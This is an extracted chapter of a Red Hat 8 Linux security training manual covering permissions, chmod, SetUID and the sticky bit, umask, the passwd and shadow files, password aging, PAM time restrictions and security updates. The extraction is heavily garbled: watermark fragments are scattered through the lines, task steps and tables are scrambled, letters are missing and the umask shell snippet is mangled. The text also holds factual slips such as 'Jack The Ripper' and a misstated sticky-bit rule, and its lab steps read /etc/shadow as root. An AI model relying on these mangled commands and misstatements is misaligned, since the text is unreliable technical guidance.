E
161
iti
on
TASK 3A-5
Viewing System Information
1. 2. 3. 4. 5. 6. 7. 8. 9.
Enter ps to view the current processes.
Enter ps aux to view the full list of all processes. Enter top to view the processes interactively.
While top is still running, press H to look at the available functions in top. Close all Terminal Windows.
Scroll through the System Monitor options, comparing them to the terminal commands you just used. When you have completed your review, close System Monitor.
11. Close the Terminal Window.
or
DO NO
ru ct
File and Directory Permissions
File and Directory Permissions

In Linux, when you log in to the system, you are identied by your user account. In addition to your user account, you might belong to a group or groups. A le can have permissions set for a user account, a group, and a category called others. If you are accessing an object and you are not the owner of the le (usually the creator of the le) or in the group that has access, then you are considered to be one of the others. Earlier, you were introduced to the information provided when viewing a les details. This included the permissions for that le. Remember that every le has an owner and a group. Previously, you looked at a le whose details were:
-rwxrw-r-- 1 User1 Testers 512 Oct 24 19:42 firstdoc.txt
In
162
st
In this line, the rstdoc.txt le has permissions of: -rwxrw-r--
In Linux, basic security measures consist of le system security, password security, and authentication methods. Lets begin by looking at le system security.
DU
Fundamental Linux Security
PL
Topic 3B
IC
AT
10. Enter df -h to view information about the disk space.
Open a Terminal Window.
Ed
From the Red Hat Main Menu, choose System ToolsSystem Monitor.
iti
on
Now, for users of Windows operating systems, this will take a bit of getting used to, but the permission structure is logical. Look at the following other le examples:
-rwxrwxrwx 1 User1 Testers 512 Oct 9 sample.txt -rw-r--r-- 1 User2 Newbies 1024 Oct 10 test.tar drwxr-xr-- 1 User3 Finance 2048 Oct 11 15:26 DB_3
In these examples, notice that the rst part of each line has a different listing of the permissions, and that the third example object is a directory (you can tell from the letter d as the rst character). You can consider the permissions to be dened in columns. The permissions are broken into the object (such as le or directory), user permissions, group permissions, and others permissions. Looking at the previous rstdoc.txt example, this breaks down into the following (divided here by the pipe symbol so that you can easily see the divisions):
- | rwx | rw- | r-- |
Ed
T DU PL IC
The rst column is a single character (in this case a dash, which represents a standard le), and is the only column that is not three characters in length. The second column represents the permissions for the user (owner), the third column represents the permissions for the group, and the fourth column represents the permissions for the others. The users permission (User1 in this example) is listed as rwx, the groups permission (Testers in this example) is listed as rw-, and the others permission is listed as r--. Files and directories have four permission types. They are Read (R), Write (W), Execute (X), and No Permission (-). These permissions vary slightly from les to directories. The Read permission for les grants the ability to open and read a les contents; for directories, the Read permission grants the ability to list the les in the directory. The Write permission for les grants the ability to modify (add, delete, or change) a les content; for directories, the Write permission grants the ability to add or remove les or links in the directory. The Execute permission for les grants the ability to execute the le (or to run the exec command); for directories, the Execute permission grants the ability to change directories to subdirectories. The No Permission permission is applied only to les, and denies access to the le. Before moving further into the permissions, we must spend a moment on number conversions. The permissions in Linux use octal numbers, which is a base-8 counting system. The octal system can represent 8 unique numbers, which might be listed in binary. The following table is a quick refresher on binary-to-octal conversions.
st
000 001 010 011 100 101 110 111 1000
0 1 2 3 4 5 6 7 10
In
DO
Binary Number
ru ct
Octal Equivalent
NO
or
AT
E
163
iti
on
For each permission (user, group, and others), there are three possible characters: r, w, and x. These permission characters are always in this order. If a permission is granted, then a 1 is assigned to that character space. If a permission is not granted, then a 0 is assigned to that character space. Lets use the permissions of the rstdoc.txt as an example. The permissions were -rwxrw-r--
Octal Number
0 1 2 3 4 5 6 7
Binary Equivalent
000 001 010 011 100 101 110 111
or
DO NO
ru ct
In
st
Therefore, the following is always true: Read = 4, Write = 2, and Execute = 1. Using this method, if you want to assign Read and Write permissions, simply add 4 + 2, to get 6. Compare that to the previous list, verifying the octal, binary, and permissions do indeed match. You will see how this system works, and how it can be very efficient. Using the octal system for setting permissions creates values such as 0400, or 0440, and more. These four numbers represent the four columns of permissions described earlier. At this time, the rst number will always be 0, as that is the character that denes the type of object (such as a le, a directory, or a link). Due to this, it is not uncommon for the leading 0 to not be listed. This would make the previous two permission examples simply 400 and 440.
Although you might end up memorizing the permission list shown, there is another method of arriving at the octal values. From your experience with binary numbers, you know that the three values listed are decimal 4, 2, and 1. Because the permissions are always dened as r, w, and x (in that order), you can also assign decimal values to these permissions. The Read permission is always on the left, the third character in binary, and can be assigned a decimal value of 4. The Write permission is always in the middle, the second character in binary, and can be assigned a decimal value of 2. The Execute permission is always on the right, the rst character in binary, and can be assigned a decimal value of 1.
DU
PL
IC
AT
Using this table, you can see that if you want to assign the permission of Read (r), and no other permission, then octal 4 is the permission to assign. Likewise, if you want to assign the permission of Read, Write, and Execute (rwx), then octal 7 is the permission to assign. As a nal example, if you want to assign the permission of Read and Write (rw), then octal 6 is the permission to assign.
Ed
iti
----x -w-wx r-r-x rwrwx
on
Permissions
The rst character is blank, therefore this is a le. The user permission is rwx, the group permission is rw-, and the others permission is r--. This can also be viewed as user permissions of 111, group permissions of 110, and others permissions of 100. The following table shows the conversions, from octal to binary to permissions.
An overall permission of 400 means that the user is given a permission of 4, the group a permission of 0, and the others a permission of 0. An overall permission of 440 means the user is given a permission of 4, the group a permission of 4, and the others a permission of 0. As a nal example, an overall permission of 774 means the user is given a permission of 7, the group a permission of 7, and the others a permission of 4.
Setting Permissions
There are two methods of working with the permissions of an object. One method uses octal numbers, and the other uses permission strings. When setting permissions by using a string, you must decide three primary questions. They are: 1. Whom will this permission affect? (u) User, (g) Group, (o) Others, (a) All 2. 3. What permission will be set? (r) Read, (w) Write, (x) Execute, (s) SetUID or SetGID, (t) Sticky Bit What type of action is to be taken? (+) Addition, (-) Removal
If you want to allow the owner (user) to have Read and Write access, the string is u+rw
st
chmod chmod chmod chmod
777 /database/Feb a+rwx /database/Feb -R 774 /database/Feb -R u+rwx,g+rwx,o+r /database/Feb
In
In the following task, you will create four user accounts, who are part of two groups. You will then create four les and two directories. Finally, you will congure the ownership of these objects, and verify the new ownership.
DO
NO
The following example shows these methods used to change the permissions on a directory. In this example, the directory is called /database/Feb. The rst two lines are examples of setting the permissions for everyone to have full access to this database. The second two lines add the -R option, which allows the changed permission to apply to all les and subdirectories in the directory. The second two lines are giving the directory Read, Write, and Execute permissions to the user and owner, and Read to others.
DU
chmod 774 vacation_pictures.tar.gz chmod u+rwx,g+rwx,o+r vacation_pictures.tar.gz
ru ct
PL
The command to use to change permissions is chmod (Change Mode). With chmod, you can use either the octal method or the string method. The following two examples show chmod being used with each method. These permissions are giving the user Read, Write, and Execute permissions, the group Read, Write, and Execute permissions, and the others Read permission.
or
The chmod Command
IC
AT
E
165
If you want to allow all (every user) to have Read and Execute access, the string is a+rx
Ed
Look at the following examples to see how these three questions, given answers, work together to create the permission string: If you want to allow the group to have Read access, the string is g+r
iti
on
TASK 3B-1
Creating Object Ownerships
1.
Use either the Terminal Window or the Red Hat User Manager to create the following list of users and groups, and assign the users to the groups. For each user, the password is qwerty. a. b. User1, GroupA User2, GroupA User3, GroupB User4, GroupB
b. c. d. 3. 4. 5. 6.
/Marketing/Tracking.txt /Research/Software.txt
/Research/Development.txt
Ed
T DU
You can either delete the existing User1 and create a new one, or modify the properties of the existing one.
c. d. 2.
Use either the Terminal Window or the Nautilus File Manager to create the following les and directories: a. /Marketing/Campaign.txt
Change directories to the Marketing directory. Enter chown User1.GroupA Campaign.txt to change the ownership of Campaign.txt. Change the ownership of Tracking.txt to User2.GroupA. Change directories to the Research directory. Change the ownership of Software.txt to User3.GroupB.
st
11. Check the current ownership and permissions for the Marketing directory. 12. Check the current ownership and permissions for the Research directory. 13. Change directories back to /root. 14. From root, change the ownership of the Marketing directory by using the chown -R .GroupA /Marketing command. 15. Change the ownership of the Research directory to GroupB.
166
In
DO
ru ct
7. 8. 9.
10. Change the ownership of Development.txt to User4.GroupB.
NO
PL
IC
Check the current ownership and permissions for the Research directory.
or
AT
In the Terminal Window, check the current ownership and permissions for the Marketing directory by using the ls -l /Marketing command.
iti
on
Assigning Permissions
Once you have created the objects described in the previous task, you have the pieces in place to create the permission structure. You are going to create permissions that allow members of Group A to have access to the Marketing folder, with User1 accessing the Campaign.txt document. User2 will be given access to the Tracking.txt document. User3 will be given access to the Software.txt document, and User4 will be given access to the Development.txt document.
TASK 3B-2
Assigning Permissions
Setup: You are logged on to Red Hat 8 as root, and a Terminal Window is open. 1. 2. 3. 4. 5. 6. 7. 8. 9. Change to the Marketing directory.
Enter chmod 740 Campaign.txt to assign the permissions to Campaign.txt. Enter chmod 740 Tracking.txt to assign the permissions to Tracking.txt. Change to the /root directory.
Ed
T DU PL IC
Change to the Research directory.
Enter chmod u+rwx,g+rwx Software.txt to assign the permissions to Software.txt.
Enter chmod u+rwx,g+rwx Development.txt to assign the permissions to Development.txt. Change to the /root directory.
st
In
At this stage, you have created four users, two groups, four les, and two directories. You then assigned the users to their groups, and assigned permissions on the les and directories. Next, you will test the permissions by logging in as the four users (using the substitute user command) and attempting to access all four les. It is recommended that you take advantage of the Workspace Switcher in this task, because it lets you have one workspace open for each user.
DO
Testing Assigned Permissions
NO
10. Enter chmod -R 770 /Research to assign the permissions to the Research directory.
ru ct
or
AT
Enter chmod -R 770 /Marketing to assign the permissions to the Marketing directory.
E
167
iti
on
TASK 3B-3
Verifying Permissions
1. 2. 3.
In the Terminal Window, enter su - User1 to switch to the User1 account. Attempt to access all four les from the previous task.
File Name
/Marketing/Campaign.txt /Marketing/Tracking.txt /Research/Software.txt /Research/Development.txt
Access Granted?
Yes Yes No No
or
NO DO
Yes Yes No No
4. 5. 6. 7. 8.
Activate the Workplace Switcher, and click any open space to switch to another workspace. Open a Terminal Window.
Enter su - User2 to switch to the User2 account. Attempt to access all four les from the previous task. Identify which ones you can access, the level of access (by trying to create a le, for example), and the ones you cannot access.
ru ct
File Name
DU
PL
IC
Level of Access Granted
rwx rwx None None
Access Granted?
In
168
st
Verify that the access is correct based on the permissions you assigned in the previous task. Activate the Workplace Switcher, and click any open space to switch to another workspace.
9.
10. Open a Terminal Window. 11. Enter su - User3 to switch to the User3 account.
AT
Verify that the access is correct based on the permissions you assigned in the previous task.
Ed
iti
rwx rwx None None
Identify which ones you can access, the level of access (by trying to create a le, for example), and the ones you cannot access. Level of Access Granted
on
12. Attempt to access all four les from the previous task. 13. Identify which ones you can access, the level of access (by trying to create a le, for example), and the ones you cannot access. Level of Access Granted
None None rwx rwx
No No Yes Yes
Verify that the access is correct based on the permissions you assigned in the previous task. 14. Switch to another workspace, open a Terminal Window, and switch to the User4 account. 15. Attempt to access all four les from the previous task.
16. Identify which ones you can access, the level of access (by trying to create a le, for example), and the ones you cannot access. Level of Access Granted
None None rwx rwx
Ed
T DU PL IC
No No Yes Yes
Verify that the access is correct based on the permissions you assigned in the previous task. 17. Close all windows and workspaces, and return to the root account.
The SetUID, SetGID, and the Sticky Bit Permissions

Earlier, when you were rst looking at permissions, three other things were listed in addition to Read, Write, Execute, and No PermissionSetUID, SetGID, and the Sticky Bit. The SetUID (or Set User Identication) permission bit can be set on an executable le. When set on a le, the le will execute not with the permissions of the user who is running the program, but with the permissions of the owner of the program. The use of this is not suggested, as it can cause security problemshaving a program execute by one user with the permissions of a different user. SetGID (or Set Group Identication) is similar to SetUID, only the permissions on the executable are based on group permissions.
st
In
DO
ru ct
NO
or
File Name
Access Granted?
AT
E
169
iti
on
File Name
Access Granted?
Applications that are designed to use the SetUID or the SetGID permission must be properly secured. These applications are often programmed to run as root, and any attempt at altering these les could lead to a system breach.
breach: The successful defeat of security controls which could result in a penetration of the system. A violation of controls of a particular information system such that information assets or system components are unduly exposed.
Using chmod as is done in the rst of the examples listed below sets the permissions on les to rwxrwxrwxthere is nothing new about that, but now we can look at the bits in front of those nine: ---rwxrwxrwx The 10th bit (reading from the right as we do in binary) designates the sticky bit. The 11th bit (reading from the right) designates the SetGID bit. The 12th bit (reading from the right) designates the SetUID bit.
Ed
T
Result
In the following examples you will see the process of setting the setGID, setUID, and the Sticky Bit permissions. In the command chmod -v 1777 file, the chmod command itself should be familiar to you by now, the -v just tells the machine to be verboseto give an output related to the command, rather than just executing the command silently.
or
NO DO
ru ct
Command
chmod -v 777 le chmod -v 1777 le chmod -v 2777 le chmod -v 3777 le chmod -v 4777 le chmod -v 5777 le chmod -v 6777 le
DU
Here are some other possible commands and their meanings. All commands give rwx to all three objects; only the 10th, 11th, and 12th bits are of interest to us for this demonstration. Comment
Mode of le changed to 0777 (rwxrwxrwx). Mode of le changed to 1777 (rwxrwxrwt). Mode of le changed to 2777 (rwxrwsrwx). Mode of le changed to 3777 (rwxrwsrwt). Mode of le changed to 4777 (rwsrwxrwx). Mode of le changed to 5777 (rwsrwxrwt). Mode of le changed to 6777 (rwsrwsrwx).
PL
So the command chmod 1777 file would give all three groups (owner, group, other) read, write, and execute permissions, but set the sticky bit so that only the root account could delete the le.
IC
st
In
170
AT
Sticky Bit is set. GID is set. GID and Sticky Bit are set. UID is set. UID and Sticky Bit are set. GID and UID are set.
iti
It is rumored that the Sticky Bit feature was originally created to let an application remain (or stick) in the computers memory even after it had nished running. This would allow for quicker recall and execution if and when that object were to be called again. As systems have increased in power and the abilities of memory (both in speed and capacity) have increased, the need for the Sticky Bit has diminished. However, a new use for the Sticky Bit has evolved. When the Sticky Bit is set for a directory, such as /tmp, it protects the les within that directory from deletion by non-owners. Consider the le /tmp/yrlyrept. If the Sticky Bit has been set for /tmp, only the owner of the /tmp/yrlyrept le or the owner of the /tmp directory can delete the le.
on
Command
chmod -v 7777 le
Result
Mode of le changed to 7777 (rwsrwsrwt).
Comment
GID, UID, and Sticky Bit are set.
Whenever a user creates a le of directory, Linux must have a system of assigning the initial permissions to that object. The system that Linux uses is called a mask. The mask is set using a command called umask. The mask is the compliment of the octal value that is assigned as permissions to an object. Here are several examples: If the permissions of a le are 664, the mask value is 002. If the permissions of a le are 666, the mask value is 000. If the permissions of a le are 663, the mask value is 003.
The default umask value can be set for all users in the /etc/bashrc le. By default, the lines that determine the umask setting look like this:
if [ "ìd -gn'`" = "ìd -un'`" -a 'ìd -u'` -gt 99 ]; then umask 002 else
Ed
T DU PL IC
Looking at this in reverse, if you have a mask of 662, the effective permissions are 004. If you have a mask of 066, the permissions are 600.
st
This may or may not be suitable for your environment, but it is recommended from a security perspectivethat this be changed, because it is not advisable to have all les readable by everyone (the others). For this reason, it is suggested that the permissions be changed so that all UIDs greater than 99 use a mask of 006, and that all UIDs less than 99 use a mask of 066. To restrict other group members from being able to write to all les while allowing all read access, you could use the mask 022
In
DO
ru ct
The lines mean that any user with a UID greater than 99 will get a umask value of 002. Any user with a UID less than 99, including root and system accounts, will get a umask value of 022. Remember that when new users are created, their UIDs start at 500, ensuring that all normal users of the system will get a umask value of 002 as their default. The effective setting of this is the compliment octal value, which is 664. A setting of 664 means the user will have rw-, the group will have rw-, and the others will have r- -.
NO
or
umask 022 fi
AT
iti
In previous versions of Red Hat Linux, the default umask value was set in the /etc/ prole le, and the UID threshold was 14.
on
171
The umask Command
TASK 3B-4
Configuring umask Settings
Setup: You are logged on to Red Hat 8 as root. 1. 2. 3. 4. 5. In your home directory, create a new le called Mask.test.
View the permissions for the new le. If necessary, close the Properties window. Navigate to the /etc/bashrc le, and make a copy of it.
Use a text editor (for instance, gedit) to open the /etc/bashrc le. View the umask settings. Change the settings for UID greater than 99 to 006, and change the settings for UID less than 99 to 046 to follow the recommendations outlined in the previous Concepts section. Close the /etc/bashrc le.
6. 7. 8. 9.
Log out and then log back in as root.
ru ct st
Password Security
All user accounts in Linux require a password. However, there is no default method in place that prevents the password from being blank, often referred to as a null password. In order for an account to be authenticated by the system, the user name and password provided during the login session must match the information stored in the system. During the installation of Linux, the default method of handling passwords is to use Message Digest 5 (MD5) encryption. If you choose not to use MD5 during installationa practice that is recommended you not dothe system will default to Data Encryption Standard (DES) encryption for the passwords. DES limits passwords to eight alphanumeric characters (meaning no punctuation or special characters), which creates an encryption of only 56 bits. It is said only 56 bits, since modern computers can crack a 56-bit password very quickly, even if the method used is brute-force cracking.
In
DO
NO
DU
PL
10. Return the umask settings in the /etc/bashrc le to their defaults. You can either re-edit the changed le, or delete the changed le and rename the backup that you made earlier in this task.
or
Compare the permissions of the two test documents to verify the new umask settings are in effect.
IC
AT
In your home directory, create a new le called Mask2.test.
Ed
iti
on
Password File
The initial operation of UNIX in storing passwords was to have a single worldreadable le that held all the passwords, in their encrypted form. Although this practice allowed for the system and applications all to have a single point of access for quick authentication of user accounts, it created a security risk. Because the le is world-readable, all users have access to read the le. However, you do not want to alter this le to no longer be readable by everyone, because system functions and applications that are designed to use the le will no longer have access. Because any user could read the le, and the cleartext password hash was plainly visible; this was the root of the problem. A user could simply view the le and write down (or even copy to a oppy disk) the password hash. They could then take the hash home and run a password cracking utility on the hash. Password cracking tools like Crack and Jack The Ripper would make short work of this challenge, and the password would be revealed in short time. The default location for the passwords is the /etc/passwd le. Because this le is world-readable, you can simply navigate to it and view the contents. In this le, the following line shows what a users entry would look like:
Account_Name:Password:UID:GID:Full_Name:Directory:Program
Ed
T DU PL IC
UIDThis is the assigned User Identication of the user account. GIDThis is the assigned Group Identication of the user account. Full_NameThis can be the users full name, or other information, as desired. DirectoryThis is the user accounts home directory.
ProgramThis denes the shell (or other program) that will run when the user account is authenticated during the login process.
You saw this le earlier in this lesson, but here it is again for your reference.
st
In
DO
ru ct
NO
or
AT
PasswordThis is the hash of the users password. If the password is null, there will be no entry here, which will remain empty (::).
Where: Account_NameThis is the user account name used during login.
iti
on
cracking: The act of breaking into a computer system. Crack: A popular hacking tool used to decode encrypted passwords. System administrators also use Crack to assess weak passwords by novice users in order to enhance the security of the AIS.
173
Ed
Figure 3-16: An example /etc/passwd le on a Linux computer.
ru ct st In
The Shadow Password File
The format of the /etc/shadow le is similar to the /etc/passwd le, but the elds are different. In this le, the following line shows what a users entry would look like:
Account_Name:Password:Last:Min:Max:Warn:Expire:Disable:Reserved
DO
The /etc/shadow le is not readable by every user of the system; it is only readable by the root account. This feature alone increases the security of the entire system considerably.
NO
If you accepted the default during installation, as it is highly recommended you do, then your passwords are not stored in the world-readable /etc/passwd le. They will instead be stored in a le called etc/shadow.
DU
In the event that shadow passwords are used, the previous entry in the /etc/ passwd le will have a signicant change. Instead of the password les showing the hash of the users password, only a single X will be displayed. This is an indictor that shadow passwords are being used. No longer can any user learn the password hash of every other userincluding root, by the waythrough viewing the /etc/passwd le.
or
PL
IC
AT
iti
on
Where: Account_NameThis is the user account name used during login. PasswordThis is the hash of the password. LastThis is the number of days since January 1, 1970, since the password was last changed. MinThis is the minimum number of days a user must wait before changing the password again. MaxThis is the maximum number of days before a user must change the password.
UNIX was released to the world in 1970; therefore, January 1, 1970, is considered the starting date of the OS.
ExpireThis is the number of days after a password expires that the account becomes disabled. DisableThis is the number of days since January 1, 1970, that the account has been disabled. ReservedThis is a reserved eld intended for future use.
or ru ct st
Figure 3-17: An example /etc/shadow le on a Linux computer.
In
DO
NO
T
DU
PL
IC
AT
E
175
In Figure 3-17, you can see that when the /etc/shadow le is used, the /etc/ passwd le is still in use. This is the reason that the elds are different. The /etc/ passwd le still contains the UID and GID information, for example. The /etc/ shadow le is concerned only with information tied to the account accessing the system.
Ed
iti
WarnThis is the number of days prior to password expiration that the user receives a warning.
on
TASK 3B-5
Viewing the Password Files
Setup: You are logged on to Red Hat 8 as root. 1. 2. 3. 4. 5. Open a Terminal Window, and navigate to the /etc/directory, and cat the passwd le. Read the entries in the le, and determine if the shadow le is in use on your system.
Observe the differences between the two les. Close any open windows.
Managing Passwords
Entry
Default Value
99999
Description
ru ct
PASS_MIN_DAYS 0 PASS_MIN_LEN 5
st
In
PASS_WARN_AGE
176
DO
NO
DU
PL
PASS_MAX_DAYS
The MAX_DAYS entry denes the number of days a user can go without changing his or her password. The default of 99999 is approximately 274 years, which is most likely a bit longer than what most organizations will require! If your organization requires high levels of security, this value will likely be 30 days or fewer. For most organizations, three months, listed as 90 days, is an adequate time for this value. Conversely, the MIN_DAYS value has a default of 0, and in most situations will be left at 0. This allows a user to change their password at any time. The MIN_LEN entry denes the minimum length of the password. The default setting of 5 is acceptable, but increasing that value is recommended to at least 7 for higher security. Remember, a longer password (as long as the rules for strong passwords are followed: alphanumeric, special characters, punctuation, and so forth) is better than a shorter password. The WARN_AGE entry denes the numbers of days a user will be warned about an expiring password, prior to the actual expiration date.
IC
Password aging can also be managed in Red Hat User Manager.
or
AT
Even though the shadow password le has options for the ages, such as minimum age and maximum age, of passwords, you should still manage these values to use what the security policy of your organization dictates. When the shadow password le is used, every new user account that is created refers to a conguration le called /etc/login.defs. This le contains the aging options, as well as the password length conguration. The default values in this le are as described in the following table.
Ed
iti
Cat the /etc/shadow le.
on
TASK 3B-6
Managing Passwords
Setup: You are logged on to Red Hat 8 as root. 1. 2. 3. Open a text editor, and the /etc/login.defs le. Change PASS_MAX_DAYS to 20, leave PASS_MIN_DAYS at 0, change PASS_MIN_LEN to 7, and leave PASS_WARN_AGE at 7. Save the le and close the editor.
Pluggable Authentication Modules (PAM)
Ed
T DU PL IC
The directory that holds the modules is /etc/pam.d/. In this directory, there will be unique les that dene the specic requirements for a program that is PAMaware. Although these les are designed to function properly when installed, you might want to change them. If you do want to alter these conguration les, it is important to understand their structure.
PAM Configuration Files
These conguration les take advantage of the modular format of PAM to provide the authentication services for their applications. The les contain calls to these modules, which are usually located in the /lib/security directory. Each line in the conguration le denes a module type, a control ag, a path to the module, and module arguments (this is an optional component, not in every line).
In
One of the rst things you might notice if you look into the details of the conguration les is that the names of the les are based on the services that an application requires, not the name of the application itself. In some instances, this is the same, such as the login application using the login service. However, you will also see differences, such as the wu-ftp application using the ftp service. This means that, in the /etc/pam.d/ directory, you will see a le for login and a le for ftp, but not a le for wu-ftp.
st
DO
ru ct
PAM enables the program designer to ignore the authentication method used. No longer does the designer need to worry about creating unique versions of an application for each authentication method, nor to recompile an application every time a new authentication scheme is introduced.
NO
or
So, how do these programs know that a new authentication scheme is being used, such as the shadow password le instead of the traditional password le? The answer is Pluggable Authentication Modules (PAM). Applications only need to be PAM-aware, or compiled to know and use PAM for authentication purposes.
AT
E
177
As the UNIX and Linux operating systems evolved, the introduction of the shadow password le allowed for greater security in regards to passwords. However, as new and more advanced systems of authentication, such as Smart Cards, are introduced, this solution also has the potential to create problems. It would be very inefficient to recompile all applications to use each and every new form of authentication that is brought into the OS. For example, FTP would have to be made aware of a user authenticating by using a Smart Card, instead of by using the traditional user account name and password.
iti
on
PAM Modules
There are four distinct PAM module types. Each type is relative to a specic part of the authentication process. The four types are:
PAM Modules
authThis module is used to authenticate the user. This can be done in a variety of ways, including requesting and verifying user name and password. accountThis module is used to verify that access is allowed. This can include checking the user account status, for expiration, or time-of-day restrictions. passwordThis module is used to dene passwords. sessionThis module is used once a user has been authenticated to manage the session. This might include refreshing session tokens.
Any one module has the ability to address more than one module type. A module may go so far as to have all four types. In the conguration le, the module type will be the rst item that is detailed. The format of the lines in the conguration le is as follows:
Module-Type Control-Flag Module-Path Module-Arguments
An example of such a line is the following line, from the rlogin conguration le:
auth required /lib/security/pam_nologin.so
PAM Control Flags
or
DO NO
ru ct

In
178
st
SufficientThis ag states that if the user is successfully authenticated, and there have been no Required ag failures, the authentication process is considered complete, the user is authenticated, and no other modules are checked. OptionalThis ag is not used very often. If the module check is a success or a failure, then this ag has no role to play. It is only when no other modules have determined a success or a failure that this ag is used. In that case, the overall PAM authentication for the module type is used.
By combining the module types and the control ags, modules can be stacked to provide a very specic authentication package. The order of the modules stacked is signicant, as the system executes the modules from the top down. Stacking these modules enables the administrator to dene a group of conditions that must be met in order for authentication to be successful. The following example of stacked modules is the rlogin conguration le:
RequisiteThis ag states that the module must be checked successfully for the authentication to be allowed. In the event the check fails, the user is informed immediately; with a message stating the failure was Required or Requisite.
DU
PL
RequiredThis ag states that the module must be checked successfully for the authentication to be allowed. In the event that the module checks and the authentication fails, the user is not informed until all modules have been checked.
IC
You have seen the module types dened, and the path is self-explanatory at this stage. The remaining component of this line that requires discussion is the control ag. The control ag in this example is required. There are four possible control ags:
AT
In this example, the module type is auth, the control ag is required, the module path is /lib/security/pam_nologin.so, and there are no arguments presented.
Ed
iti
on
auth auth auth auth auth
required /lib/security/pam_nologin.so required /lib/security/pam_securetty.so required /lib/security/pam_env.so sufficient /lib/security/pam_rhosts_auth.so required /lib/security/pam_stack.so service=system-auth
Line onePAM will verify that the /etc/nologin le does not exist. Line twoPAM will verify that the user is not trying to login remotely as root, over an unencrypted network connection. Line threePAM will load any environment variables that are dened.
Line vePAM will use standard user name and password authentication. (This line will be checked only if the previous line is not successful.)
One way that PAM can be used to increase the security of the system is with the other conguration le. This lefound at /etc/pam.d/otheris what the system uses when it cannot nd a conguration le for a specic application. The default conguration of this le is as follows:
auth required /lib/security/pam_deny.so account required /lib/security/pam_deny.so password required /lib/security/pam_deny.so session required /lib/security/pam_deny.so
Ed
T DU PL IC
Security with PAM
This is the equivalent of stating that unless there is a conguration le that can grant access, deny everyone. The pam_deny.so will always produce a failure, and because this conguration le includes the pam_deny.so on all four types, a failure will always be the end result of checking this le.
st
In
DO
ru ct
NO
or
AT
E
179
iti
Line fourPAM will verify a successful rhosts authentication; if successful, the connection is allowed, and authentication is complete.
on
By reading this stack, you can determine the following details of the conguration le:
The Red Hat Linux distribution includes many other PAM modules that have an effect on the security of the system. The following is just a partial listing of the modules available in the system, and a brief description of what and/or how they can be used: pam_accessThis checks for access information, such as account expiration. pam_denyThis denies all access.
pam_groupThis sets permissions based on /etc/group and other congurable options. pam_limitsThis sets limits on resources.
pam_lastlogThis displays information about the last user logged in. pam_nologinThis denies login based on /etc/nologin.
pam_permitThis always allows access (its the inverse of the pam_deny module). pam_securettyThis uses the authentication of /etc/securetty. pam_tallyThis tracks login attempts, and allows for locking of accounts after a dened number of failed attempts. pam_timeThis allows for time-based controls to applications and services. pam_wheelThis denes authentication based on the user account belonging to the wheel group.
Ed
T DU
pam_rhosts_authThis uses the authentication of /rlogin/rsh.
Securing Access with PAM
st
180
In
DO
ru ct
The time of day.
One of the tasks you will likely want to perform is to control access to objects or to the system based on time. For example, your corporate security policy might state that users are not allowed to log in when the office is closed. You can implement this policy by using the module pam_time, found at /lib/security/pam_ time.so. This module can control access based on any of the following elements: The user account name. The day of the week.
or
NO
The service the user account is requesting to use. The terminal where the request originates.
PL
IC
AT
iti
on
pam_cracklibThis checks the strength of passwords.
ttysThis eld is the terminal that is to have time restrictions enforced. ttyp* will enforce the restrictions on all remote terminal connections, such as Telnet. tty* will enforce the restrictions on all console terminal connections.
Ed
T DU PL IC
timeThis eld denes the actual times that are going to be restricted. The times are entered using the 24-hour clock format, where 11:00 A.M. to 3:00 P.M. is 1100-1500. Also dened in this eld are day entries, if the restrictions are based on the day of the week. Days are dened by their rst two lettersMonday is Mo, Wednesday is We, and so on. If you want to restrict all days of the week, you can use the two letters Al; if you want to restrict only weekdays, you can use the two letters Wk; and if you want to restrict only weekends, you can use the two letters Wd.
The | character means OR. An example is User1|User2, meaning User1 or User2.
The * character is a wildcard. An example is log*, meaning everything that starts with the log. The * character, when used in the users eld, means all user accounts.
st
login;tty*;*!User1;!Al2100-0500
login;ttyp*!tty*;*!User1;!Al2100-0500
In this nal example, all users except for root are denied access to the console login at all times.
login;tty*&!ttyp*;*!root;!Al0000-2400
In
The second example is similar to the rst. However, in this example, users are restricted from using a remote terminal connection, but they are allowed to use a console connection to gain access to the system. The same user and hour restrictions are in place.
DO
NO
By combining these characters and options, you can create a line in the /etc/ security/time.conf le that restricts access according to your policy. The following example shows a line that restricts access. No user, other than User1, is allowed to log in to the system (by using either remote or console access) during the hours of 9:00 P.M. and 5:00 A.M., every day of the week.
ru ct
The & character means AND. An example is User1&User2, meaning both User1 and User2.
or
AT
The elds are input with the use of four special characters: the exclamation point (!), the pipe symbol (|), the ampersand (&), and the asterisk(*). The ! character means NOT. An example is !root, meaning not root, or except root.
E
181
iti
usersThis eld denes the users affected by the time restrictions. If you want to have the restrictions affect all users, substitute the * character in this location.
on
The execution of the pam_time module is based on the associated conguration le. For the time restrictions, the conguration le is /etc/security/time.conf. The elds in this conguration le are: servicesThis eld is the actual service that is to have time restrictions enforced. A very common example of this is the login service. In the event that there are multiple services, such as login and su, in the conguration eld, this is listed as login&su.
When accessing your computer via the console, you are using tty*. When accessing remotely, you are using ttyp*.
Security Updates
It is a given that in the security world there will be holes found in applications, and that other security risks are going to be found. The world of security is dynamic, and it can be very difficult for an administrator to keep up-to-date with all the newest exploits and/or attacks against systems. In the security hole, unfortunately, is the Red Hat distribution of Linux. Red Hat, Inc., has stated their commitment to releasing updates to x the holes as quickly as possible. Once the patch has been tested and is ready for release, it will be distributed to the public as an official Red Hat errata update. When you are downloading updates, be sure to check the signature of the le, and compare it to the signature of the le you download. It is common for an attacker to create a Trojan version of an update, which contains a new security hole. There are two methods for obtaining security updates. One is through the Red Hat Network, and the other is through official errata.
The Red Hat Network provides for an automated updating process. The system can check your system, determine the needed updates, download the update, verify the signature of the update, and even perform the install automatically. If you do not want the update to install automatically, you can schedule the installs at a time you determine. In order for the Red Hat Network update system to work, each computer that you want to have updated will have to create a system prole. The system prole identies the computer using software and hardware information, and the information is kept condential. When the Red Hat Network determines your system needs an update, you can be notied via email. In order to apply the update, there is a program called Red Hat Update Agent. More information about this process can be found at http:// rhn.redhat.com.
Ed
T DU
The Red Hat Network
or
DO NO
In
182
st
ru ct
Security Errata
rpm -qa gpg-pubkey*
Red Hat issues security errata reports, as they are published, on the Red Hat Linux Errata Web site www.redhat.com/apps/support/errata. Here, you can select a product and display the security updates that are unique to that product. This saves you the time of sorting through all the updates to nd the ones of relevance to you. All official Red Hat Security Errata updates are signed with the Red Hat, Inc., GPG key. Red Hat 8.0 will automatically attempt to verify the GPG signature before installing an RPM. If you do not have the key installed, it can be found on the Red Hat CD-ROM. The key can be imported to a keyring by using the following command:
rpm --import /mnt/cdrom/RPM-GPG-KEY
Once it is installed, you will want to verify the key. To display all keys installed for further RPM verication, use the following command:
